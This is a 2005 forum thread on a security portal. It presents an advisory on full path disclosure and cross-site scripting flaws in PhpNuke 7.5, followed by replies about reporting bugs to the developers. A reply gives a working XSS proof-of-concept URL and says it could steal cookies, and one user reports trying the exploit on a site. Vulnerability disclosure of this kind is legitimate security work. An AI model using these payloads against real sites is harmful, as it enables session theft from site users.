Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
March 28, 2024
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 461
Members: 0
Total: 461
PacketStorm News
·301 Moved Permanently

read more...
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpNuke -> waraxe-2005-SA#040 - Full path disclosure and XSS in PhpNuke
Post new topic  Reply to topic View previous topic :: View next topic 
waraxe-2005-SA#040 - Full path disclosure and XSS in PhpNuke
PostPosted: Mon Feb 14, 2005 10:20 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Author: Janek Vind "waraxe"
Date: 14. February 2005
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-40.html


Target software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Php-Nuke is a popular opensource content management system, written in php by
Francisco Burzi. This CMS is used on many thousands websites, because it's
freeware, easy to install and manage and has broad set of features.

Homepage: http://phpnuke.org


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


A - Full Path Disclosure
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A1 - full path disclosure in "db/db.php":

http://localhost/nuke75/db/db.php

Fatal error: Cannot instantiate non-existent class:
sql_db in D:\apache_wwwroot\nuke75\db\db.php
on line 86


A2 - full path disclosure in "mainfile.php":

http://localhost/nuke75/index.php?inside_mod=1

Warning: main(../../config.php): failed to open stream:
No such file or directory in D:\apache_wwwroot\nuke75\mainfile.php
on line 103

Fatal error: main(): Failed opening required '../../config.php'
(include_path='.;c:\php4\pear') in D:\apache_wwwroot\nuke75\mainfile.php
on line 10


A3 - full path disclosure in "modules/Downloads/index.php":

http://localhost/nuke75/modules.php?name=Downloads&d_op=menu

error: Call to undefined function: opentable() in
D:\apache_wwwroot\nuke75\modules\Downloads\index.php on line 75



A4 - full path disclosure in "modules/Web_Links/index.php":

http://localhost/nuke75/modules.php?name=Web_Links&l_op=menu

Fatal error: Call to undefined function: opentable() in
D:\apache_wwwroot\nuke75\modules\Web_Links\index.php on line 65



B - Cross-Site Scripting aka XSS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

B1 - xss in "/modules/Downloads/index.php":

http://localhost/nuke75/modules.php?name=Downloads&d_op=NewDownloads
&newdownloadshowdays=[xss code here]


B2 - xss in "/modules/Web_Links/index.php":

http://localhost/nuke75/modules.php?name=Web_Links&l_op=NewLinks
&newlinkshowdays=[xss code here]



How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


How to fix those bugs - http://www.waraxe.us/forums.html


Additional resources:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Base64 encoder and decoder - http://base64-encoder-online.waraxe.us/

SiteMapper - free php script for phpNuke powered websites -
new version 0.2 available for download - http://sitemapper.waraxe.us/


Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to icenix, Raido Kerna, g0df4th3r and slimjim100!
Tervitused - Heintz!

Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ] ------------------------------------


Last edited by waraxe on Sun Feb 12, 2006 11:07 pm; edited 1 time in total
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Tue Feb 15, 2005 4:23 pm Reply with quote
MaDeRkAn
Regular user
Regular user
 
Joined: Feb 15, 2005
Posts: 5




Can you give me an example for xss code in here and What do I need to know xss code ? I'm beginner at this part.

_________________
NoTHinG is SeCuRe
View user's profile Send private message Visit poster's website
PostPosted: Tue Feb 15, 2005 7:13 pm Reply with quote
sp3x
Valuable expert
Valuable expert
 
Joined: Feb 15, 2005
Posts: 10




i have question to waraxe....

Where can i report bugs in phpnuke.... is there any mail to them ??
and also the same question but in postnuke ...

thanks for info...
View user's profile Send private message
PostPosted: Tue Feb 15, 2005 8:28 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




MaDeRkAn wrote:
Can you give me an example for xss code in here and What do I need to know xss code ? I'm beginner at this part.


Phpnuke has some countermeasures against trivial xss attacks.
I tried some attack forms and one, that works on many places:

http://www.*****.com/modules.php?name=Downloads&d_op=NewDownloads&newdownloadshowdays=aa<body%20onload=alert(123)>

This is just proof of concept, it will not do any real "work". But
it can be used for example as cookie thief.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Tue Feb 15, 2005 8:40 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




sp3x wrote:
i have question to waraxe....

Where can i report bugs in phpnuke.... is there any mail to them ??
and also the same question but in postnuke ...

thanks for info...


Phpnuke is unique software, because there is very big number of
the various derivations, versions, editions, patches, etc...
And if you will try to contact with Francisco Burzi himself, then you
just will not get any answer. So, if i will discover some major security
hole in most of the phpnuke versions, then what i can do - try to
contact with all of the derivations authors? Its impossible...
So in case of phpnuke i will just release public advisory to
securityfocus, secunia and other lists and patches will be coming out
soon, thats sure. Of course, many sites will get hurt because of the
phpnuke insecurity (before they will be patched), but thats the life.
Postnuke authors are far more concerned about security and
they can be contacted before public advisory, so they can develope
patch before attacks go wild. Look here :

http://waraxe.us/ftopict-18.html
View user's profile Send private message Send e-mail Visit poster's website
Hi Waraxe
PostPosted: Wed Feb 16, 2005 8:47 am Reply with quote
Zeelock
Active user
Active user
 
Joined: Jan 27, 2005
Posts: 29
Location: Where stars come out at night




Developer is Francesco Burzi, not Francisco ;->

I always like your work. You should do some workshops as well.

The rest of the world should learn from you.

Cheers

_________________
If it seems to be impossible, just step up your level!
View user's profile Send private message
PostPosted: Wed Feb 16, 2005 9:31 pm Reply with quote
sp3x
Valuable expert
Valuable expert
 
Joined: Feb 15, 2005
Posts: 10




hmmm this is very bad...
soooo you suggest to post the bugs to bugtraq ??

with no contact phpnuke team...

i have some bugs and there are critical also

What do you suggest ??

thanks for help ...
View user's profile Send private message
PostPosted: Wed Feb 16, 2005 9:38 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




sp3x wrote:
hmmm this is very bad...
soooo you suggest to post the bugs to bugtraq ??

with no contact phpnuke team...

i have some bugs and there are critical also

What do you suggest ??

thanks for help ...


No, i suggest to try to contact with phpnuke team, of course.
What i am saing, is that i personally have bad experience with phpnuke security bugs reporting to developers. Its my personal experience and
to you i suggest to try to report security probs as by good traditions.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Feb 16, 2005 10:17 pm Reply with quote
sp3x
Valuable expert
Valuable expert
 
Joined: Feb 15, 2005
Posts: 10




thanks Smile
but how ??
is there any mail to them.... on their site i dont see any contact to report the bugs...
View user's profile Send private message
PostPosted: Mon Mar 14, 2005 6:42 pm Reply with quote
KingOfSka
Advanced user
Advanced user
 
Joined: Mar 13, 2005
Posts: 61




i'm testing this exploit on a site, the full path exploit works, but the xss injection always says "The html tags you attempted to use are not allowed", and i've tryied many way...
any idea ?
View user's profile Send private message Visit poster's website
waraxe-2005-SA#040 - Full path disclosure and XSS in PhpNuke
  www.waraxe.us Forum Index -> PhpNuke
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB © 2001-2008 phpBB Group






Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.131 Seconds